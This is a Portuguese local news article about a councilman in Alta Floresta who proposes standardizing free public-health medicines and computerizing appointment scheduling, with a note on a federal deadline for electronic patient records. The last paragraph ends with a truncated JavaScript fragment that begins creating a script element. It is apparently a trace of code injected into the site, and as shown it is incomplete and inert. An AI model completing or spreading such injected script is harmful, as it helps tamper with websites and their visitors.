Capa / Em Destaque / Vereador Charles sugere padronização de medicamentos e agendamento informatizado

Vereador Charles sugere padronização de medicamentos e agendamento informatizado

GEDSC DIGITAL CAMERA

Vereador Charles

Dionéia Martins

O vereador Charles Miranda de Medeiros, reeleito para o terceiro mandato neste último dia 02, em seu discurso na sessão ordinária da Câmara Municipal de Alta Floresta, desta terça-feira, 11, sugeriu que a Secretaria Municipal de Saúde padronize os medicamentos distribuídos gratuitamente na rede pública e implante o agendamento de consultas informatizado.

O vereador que é médico concursado do município, disse que a falta de padronização gera desperdício. Alta Floresta possui 15 Unidades Básicas de Saúde (UBS), e cada uma com um médico. “Cada PSF tem um médico com uma formação, com um receituário diferente do outro, então chega uma paciente com uma patologia qualquer, ele prescreve um medicamento que não tem na farmácia básica e esse paciente não tem dinheiro pra comprar”, exemplificou Charles.

Charles afirma que o alinhamento entre os profissionais de saúde e a informatização vai dá eficiência e eficácia para a saúde pública, já que existe vários tipos de medicamentos para uma mesma doença. . “Existe medicamento eficiente e com eficácia pra tratar aquela doença, só que as vezes o profissional já tem uma outra linha de medicamentos de acordo com a experiência dele”.

Charles disse que vai propor ao Secretário de Saúde uma reunião entre os profissionais que atendem nas UBSs para que possa fazer este alinhamento, e com isso o município vai economizar. “Essa padronização é para quê quando a prefeitura for comprar, compre esses medicamentos que vai ficar um custo mais barato”, afirmou.

INFORMATIZAÇÃO NAS CONSULTAS

Outra sugestão dada por Charles é o agendamento informatizado de consultas. O vereador citou como exemplo o PSF que ele atende e que as vezes sobra vaga, enquanto em outros próximos falta. Esse agendamento permitiria que uma UBS direcionasse o paciente para outra próxima. “É informatizar o sistema de agendamento da rede pública, para que exista uma conexão de informação que possa fazer essa ponte”, justificou.

Esse redirecionamento do paciente para outro PSF evitaria que doenças mais graves se complique, evitando uma internação. “Então você tem uma maneira de distribuir o usuário de uma maneira eficaz sem precisar ele voltar outro dia, se for uma doença cotidiana tudo bem, porque as vezes é um principio de apendicite, uma pneumonia, uma doença mais grave que vai esperar um dia complica, e vai virar um atendimento de urgência e emergência”, ressaltou Miranda.

GOVERNO FEDERAL TEM PRAZO

Municípios de todo o país têm 60 dias para adotar o prontuário eletrônico em unidades básicas de saúde. O prazo vence no dia 10 de dezembro. Uma nova versão da plataforma, lançada na quinta-feira, 6, pelo governo federal, permite que todos os serviços de saúde da cidade possam acompanhar o histórico, os dados e o resultado de exames dos pacientes.

Também será possível, de acordo com o Ministério da Saúde, verificar em tempo real a disponibilidade de medicamentos em farmácias e registrar visitas de agentes de saúde. A expectativa é que a transmissão digital dos dados da rede municipal à base nacional permita ainda a verificação online dos gastos feitos via Sistema Único de Saúde (SUS).

A plataforma digital será oferecida gratuitamente pelo ministério, mas o envio de dados poderá ser feito pelos municípios por meio de sistema próprio. A previsão dos ministério é de uma economia de R$ 84 milhões ao ano com tecnologias para informação. Os municípios que não se adequarem à proposta, terão repasses bloqueados pelo governo federal.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top